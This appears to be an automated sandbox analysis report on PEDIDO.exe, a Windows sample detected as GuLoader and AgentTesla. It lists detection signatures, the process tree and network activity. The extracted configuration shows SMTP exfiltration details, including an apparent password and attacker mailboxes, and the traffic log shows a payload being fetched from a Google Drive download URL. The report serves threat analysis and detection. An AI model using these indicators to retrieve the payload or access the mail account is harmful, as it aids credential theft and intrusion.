Loading ...

Play interactive tourEdit tour

Windows Analysis Report PEDIDO.exe

Overview

General Information

Sample Name:PEDIDO.exe
Analysis ID:1664
MD5:8bc016e5779262b772d16903af6e142c
SHA1:5fa020fa3a63a481eff19fca06e11c424d346e9f
SHA256:69a8e2fa9664dce4cb9ab2d1a2e7ba67bd0516b9e4c8608e9c246d614be3241f
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • PEDIDO.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 8BC016E5779262B772D16903AF6E142C)
    • RegAsm.exe (PID: 412 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 420 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 432 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 428 cmdline: 'C:\Users\user\Desktop\PEDIDO.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comsarahmorg434@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.69378058879.0000000002AA0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 428JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 428JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 428, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49827

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.7136.7.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comsarahmorg434@gmail.com"}
            Antivirus detection for URL or domainShow sources
            Source: http://mail.tccinfaes.comAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: mail.tccinfaes.comVirustotal: Detection: 11%Perma Link
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C2338 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C2A70 CryptUnprotectData,
            Source: PEDIDO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49796 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: CLARANET-ASClaraNETLTDGB CLARANET-ASClaraNETLTDGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 188.93.227.195 188.93.227.195
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49827 -> 188.93.227.195:587
            Source: global trafficTCP traffic: 192.168.11.20:49827 -> 188.93.227.195:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000003.70287265297.0000000000F61000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74043481824.000000001DD48000.00000004.00000001.sdmpString found in binary or memory: http://1rfE3t8xqRYG9cY.net
            Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmpString found in binary or memory: http://1rfE3t8xqRYG9cY.netD
            Source: RegAsm.exe, 00000006.00000002.74042766614.000000001DCF9000.00000004.00000001.sdmpString found in binary or memory: http://1rfE3t8xqRYG9cY.nett-
            Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://GkEcfT.com
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enr
            Source: RegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmpString found in binary or memory: http://mail.tccinfaes.com
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0)
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: RegAsm.exe, 00000006.00000002.74043153246.000000001DD1B000.00000004.00000001.sdmpString found in binary or memory: http://tccinfaes.com
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: RegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.6.drString found in binary or memory: http://x1.i.lencr.org/
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: RegAsm.exe, 00000006.00000002.74032045876.0000000000ED3000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/:Z
            Source: RegAsm.exe, 00000006.00000002.74049220847.000000001FD60000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/D
            Source: RegAsm.exe, 00000006.00000003.70368102038.000000001FE0D000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org:80/=
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000006.00000002.74031926505.0000000000EB8000.00000004.00000020.sdmpString found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000006.00000003.69349876616.0000000000EE7000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/%%doc-0g-as-docs.googleusercontent.com
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpString found in binary or memory: https://doc-0g-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmuj
            Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/n
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP
            Source: RegAsm.exe, 00000006.00000003.69349934018.0000000000EF3000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP2Z18XHWq5VUtwT2Ok
            Source: RegAsm.exe, 00000006.00000002.74031570400.0000000000E68000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBPE
            Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74042361635.000000001DCB3000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000006.00000002.74042052956.000000001DC95000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000006.00000002.74042361635.000000001DCB3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rnd0dmujjgbkrh52f3e2mg4i3inr6at3/1634201175000/11595216098898371304/*/1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49796 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: PEDIDO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_00401673
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_00401626
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_00401437
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA5290
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA1623
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA1A0E
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA398D
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA6733
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA071E
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA391C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A4BA58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A4C7B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00A43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00AA6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00AA07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00B3C04B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00B3BF79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E478D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E4F540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E47A3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E4D7A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E46728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E444F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00E43330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C7096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9CAC28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C6908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9CF260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9CCB97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C0006
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9C6148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1FD45E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1FD44ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1FD45DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1FD46AF1
            Source: PEDIDO.exe, 00000001.00000000.68987414671.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLurifaksernes.exe vs PEDIDO.exe
            Source: PEDIDO.exeBinary or memory string: OriginalFilenameLurifaksernes.exe vs PEDIDO.exe
            Source: C:\Users\user\Desktop\PEDIDO.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
            Source: PEDIDO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PEDIDO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\PEDIDO.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\PEDIDO.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3DJump to behavior
            Source: C:\Users\user\Desktop\PEDIDO.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFF706F9495D122F7.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@10/3@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.69378058879.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_00405AC6 push esi; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_004046A8 push es; ret
            Source: C:\Users\user\Desktop\PEDIDO.exeCode function: 1_2_02AA095A push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_1C9CAC28 push edi; retn 1C9Ch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
